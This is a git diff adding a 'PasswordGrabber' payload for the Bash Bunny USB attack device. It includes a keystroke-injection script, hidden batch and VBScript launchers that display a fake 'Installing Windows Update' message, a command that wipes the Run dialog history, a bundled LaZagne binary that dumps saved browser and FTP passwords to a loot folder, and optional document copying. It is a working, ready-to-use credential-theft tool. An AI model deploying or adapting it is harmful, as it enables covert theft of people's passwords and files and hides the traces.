diff --git a/payloads/library/PasswordGrabber/d.cmd b/payloads/library/PasswordGrabber/d.cmd new file mode 100644 index 00000000..604ef639 --- /dev/null +++ b/payloads/library/PasswordGrabber/d.cmd @@ -0,0 +1,4 @@ +@echo off +start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" +cscript %~dp0\i.vbs %~dp0\e.cmd +@exit \ No newline at end of file diff --git a/payloads/library/PasswordGrabber/e.cmd b/payloads/library/PasswordGrabber/e.cmd new file mode 100644 index 00000000..b8e4d40f --- /dev/null +++ b/payloads/library/PasswordGrabber/e.cmd @@ -0,0 +1,35 @@ +@echo off +@echo Installing Windows Update + +REM Delete registry keys storing Run dialog history +REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f + +REM Creates directory compromised of computer name, date and time +REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious + +setlocal +cd /d %~dp0 +%~dp0\laZagne.exe all > %~dp0\..\..\loot\passwords.txt + +set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% +mkdir %dst% >>nul + +if Exist %USERPROFILE%\Documents ( +REM /C Continues copying even if errors occur. +REM /Q Does not display file names while copying. +REM /G Allows the copying of encrypted files to destination that does not support encryption. +REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. +REM /E Copies directories and subdirectories, including empty ones. + +REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul + +REM Same as above but does not create empty directories +REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul + +) + +REM Blink CAPSLOCK key +start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" + +@cls +@exit diff --git a/payloads/library/PasswordGrabber/i.vbs b/payloads/library/PasswordGrabber/i.vbs new file mode 100644 index 00000000..1ffd3c3e --- /dev/null +++ b/payloads/library/PasswordGrabber/i.vbs @@ -0,0 +1 @@ +CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False diff --git a/payloads/library/PasswordGrabber/laZagne.exe b/payloads/library/PasswordGrabber/laZagne.exe new file mode 100644 index 00000000..84724d07 Binary files /dev/null and b/payloads/library/PasswordGrabber/laZagne.exe differ diff --git a/payloads/library/PasswordGrabber/payload.txt b/payloads/library/PasswordGrabber/payload.txt new file mode 100644 index 00000000..3dd70e68 --- /dev/null +++ b/payloads/library/PasswordGrabber/payload.txt @@ -0,0 +1,24 @@ +#!/bin/bash +# +# Title: USB Exfiltration +# Author: Hak5Darren +# Version: 1.0 +# Target: Windows XP SP3+ +# Props: Diggster, IMcPwn +# +# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, +# which in turn executes e.cmd invisibly using i.vbs +# which in turn copies documents to the loot folder on the Bash Bunny. +# + +# Source bunny_helpers.sh to get environment variable SWITCH_POSITION +source bunny_helpers.sh + +LED R +ATTACKMODE HID STORAGE +QUACK SET_LANGUAGE se +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" +QUACK ENTER +LED G diff --git a/payloads/library/PasswordGrabber/readme.md b/payloads/library/PasswordGrabber/readme.md new file mode 100644 index 00000000..48605c9f --- /dev/null +++ b/payloads/library/PasswordGrabber/readme.md @@ -0,0 +1,33 @@ +# PasswordGrabber + +* Author: RazerBlade +* Creds: Hak5Darren, AlessandroZ +* Version: Version 1.0 +* Target: Windows + +## Description + +Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... +This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. +Full read here: https://github.com/AlessandroZ/LaZagne + + +## Configuration +By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. +I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy + +If you are afraid of .exe you can compile your self from his github: https://github.com/AlessandroZ/LaZagne + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red | Attack Setup | +| Green | Attack Complete | + +## Discussion +[Hak5 Forum Thread]("https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/") + +## Future Work + +I will try to add mac support and also make the password file appear in the loot folder that [usb_exfiltrator] creates.